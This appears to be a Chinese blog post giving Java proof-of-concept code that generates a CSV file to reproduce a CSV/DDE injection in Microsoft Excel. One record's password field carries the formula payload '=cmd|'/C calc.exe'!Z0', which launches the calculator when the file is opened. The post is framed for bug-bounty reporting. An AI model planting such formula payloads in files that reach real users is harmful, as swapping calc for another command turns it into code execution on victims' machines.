csv注入复现代码

zoukankan html css js c++ java

csv注入复现代码

以下代码生成的csv文件，使用Microsoft Execl能成功弹出计算器，虽然打开时有安全提示，但是大多数src还是会接收该类漏洞

--------------------------------------------------------------------------------------------

package jinqi;

public class User {
   private String username;
   private String password;
   private int age;
   private String name;
   public String getUsername() {
       return username;
   }
   public void setUsername(String username) {
       this.username = username;
   }
   public int getAge() {
       return age;
   }
   public void setAge(int age) {
       this.age = age;
   }
   public String getName() {
       return name;
   }
   public void setName(String name) {
       this.name = name;
   }
   public String getPassword() {
       return password;
   }
   public void setPassword(String password) {
       this.password = password;
   }
   public User(String username, String password, String name, int age) {
       super();
       this.username = username;
       this.password = password;
       this.age = age;
       this.name = name;
   }


}

--------------------------------------------------------------------------------

package jinqi;

import java.io.FileWriter;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;

import org.apache.commons.csv.CSVFormat;
import org.apache.commons.csv.CSVPrinter;

public class Test {
   private static final String NEW_LINE_SEPARATOR = " ";

    //CSV文件头
    private static final Object [] FILE_HEADER = {"用户名","密码","名称","年龄"};

    /**
     * 写CSV文件
     *
     * @param fileName
     */
    public static void writeCsvFile(String fileName) {
        FileWriter fileWriter = null;
        CSVPrinter csvFilePrinter = null;
        //创建 CSVFormat
        CSVFormat csvFileFormat = CSVFormat.DEFAULT.withRecordSeparator(NEW_LINE_SEPARATOR);
        try {
            //初始化FileWriter
            fileWriter = new FileWriter(fileName);
            //初始化 CSVPrinter
            csvFilePrinter = new CSVPrinter(fileWriter, csvFileFormat);
            //创建CSV文件头
            csvFilePrinter.printRecord(FILE_HEADER);

            // 用户对象放入List
            List<User> userList = new ArrayList<User> ();
            userList.add(new User("zhangsan", "=2+7", "张三", 25));
            userList.add(new User("lisi", "=cmd|'/C calc.exe'!Z0", "李四", 23));
            userList.add(new User("wangwu", "456", "王五", 24));
            userList.add(new User("zhaoliu", "zhaoliu", "赵六", 20));

            // 遍历List写入CSV
            for (User user : userList) {
                List<String> userDataRecord = new ArrayList<String>();
                userDataRecord.add(user.getUsername());
                userDataRecord.add(user.getPassword());
                userDataRecord.add(user.getName());
                userDataRecord.add(String.valueOf(user.getAge()));
                csvFilePrinter.printRecord(userDataRecord);
            }
            System.out.println("CSV文件创建成功~~~");

        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            try {
                fileWriter.flush();
                fileWriter.close();
                csvFilePrinter.close();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }

    /**
     * @param args
     */
    public static void main(String[] args){
        writeCsvFile("G:\jinqi.csv");
    }

}

查看全文

相关阅读:
【转】小波与小波包、小波包分解与信号重构、小波包能量特征提取暨小波包分解后实现按频率大小分布重新排列(Matlab 程序详解）
IPython：一种交互式计算和开发环境
 python防止字符串转义
 Could not find a version that satisfies the requirement numpy>=1.7.0 (from pan das==0.17.0) (from versions: ) No matching distribution found for numpy>=1.7.0 (from pandas==0.17.0)
【转】出现“ValueError : numpy.ufunc has the wrong size, try recompiling" 解决方法
 【转】最简单的安装pip的方法
 小波变换教程（十七）
小波变换补充知识
 小波变换教程(十六)
C# 保护进程不被结束(源代码）防任务管理器结束进程

原文地址：https://www.cnblogs.com/jinqi520/p/11077410.html